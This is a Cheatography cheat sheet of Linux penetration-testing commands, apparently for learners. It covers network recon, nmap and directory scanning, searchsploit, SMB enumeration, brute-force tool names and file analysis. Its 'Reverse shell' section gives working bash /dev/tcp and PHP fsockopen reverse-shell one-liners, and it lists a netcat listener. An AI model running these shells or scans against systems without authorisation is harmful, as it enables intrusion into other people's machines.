Show Menu
Cheatography

Linux Hacking Basic Cheat Sheet by

Basic networking

Show IP config­uration
ip a s
DNS lookup
dig host-n­ame.com
DNS Reverse lookup
dig -x 10.10.1­0.12
Lookup DNS entries for a host or ip
nslookup google.com
IP for hostname
host google.com

Http Download

Using curl
curl http:/­/ho­st:­808­0/f­ile.sh - o output.sh
Using wget
wget http:/­/ho­st:­808­0/f­ile.sh

Enumer­ation

Portscan (first 10000 ports)
nmap -sC -sV 10.10.1­0.12
Portscan (all ports)
nmap -p- -sV 10.10.1­0.12
Portscan (UDP)
nmap -sU 10.10.1­0.12
Gobuster
gobuster -w wordli­st.txt dir -u http:/­/10.10.10.12
Dirb
dirb http:/­/10.10.10.12 wordli­st.txt
Wordpress enumer­ation
Website technology enumer­ation
DNS Enumer­ation
dnsrecon -d google.com -n 10.10.1­0.12
DNS Zonetr­ansfer
dnsrecon -t axfr -d zonetr­ans­fer.me
List subdomains
sublist3r -d target­-ho­st.com
Wordlists can be found at
/usr/­sha­re/­wor­dli­sts­/di­rbu­ster/
 

Find target in network

Readout ARP cache
ip neigh
Nmap Host Discovery
nmap -sn 10.10.1­0.0/24
TCP scan
nmap -Pn 10.10.1­0.0/24

Serving own data

Python2 Webserver (current folder)
python -m Simple­HTT­PServer 8080
Python3 Webserver (current folder)
python3 -m http.s­erver 8080
Listen on port
nc -lvnp 8080

Exploit DB

Search for exploit
search­sploit apache
View exploit
search­sploit -x path/t­o/e­xploit
Copy exploit to current directory
search­sploit -m path/t­o/e­xploit

Brute forcing

Bruteforce websites (e.g. login)
hydra
Bruteforce website paths
wfuzz
Crack files
john
Check each man-page to find the detailed command parameters

Server Message Block (SMB)

SMB enumer­ation tool
smbmap -H 10.10.1­0.12
SMB network browser
smbtree
SMB Client
smbclient //10.1­0.1­0.12/
 

Useful commands

Change directory
cd folder
Create directory
mkdir foldername
Delete file
rm file.jpg
Delete folder
rm -r folder
Search string in file
grep pattern file.txt
Find file in a folder
find /path -name "­*.x­ml"
Edit file (vi)
vi file.txt

Reverse shell

Bash
bash -i >& /dev/t­cp/­10.0.0.1/8080 0>&1
PHP
$sock=­fso­cko­pen­("10.0.0.1­"­,12­34)­;ex­ec(­"­/bin/sh -i <&3 >&3 2>&3");
Other webshells can be found at
/usr/­sha­re/­web­she­lls/

File analysis

What is this file?
file unknown.x
Is there something hidden?
binwalk file.png
Extract hidden content
binwalk -e file.png

Encodi­ng/­Dec­oding

Text to base64
echo -n "­tex­t" | base64
base64 to text
echo -n "­dGV­4dA­==" | base64 -d
hexeditor
xxd

Help Us Go Positive!

We offset our carbon usage with Ecologi. Click the link below to help us!

We offset our carbon footprint via Ecologi
 

Comments

No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Linux Command Line Cheat Sheet
          mod_rewrite Cheat Sheet
          Vim NERDTree Cheat Sheet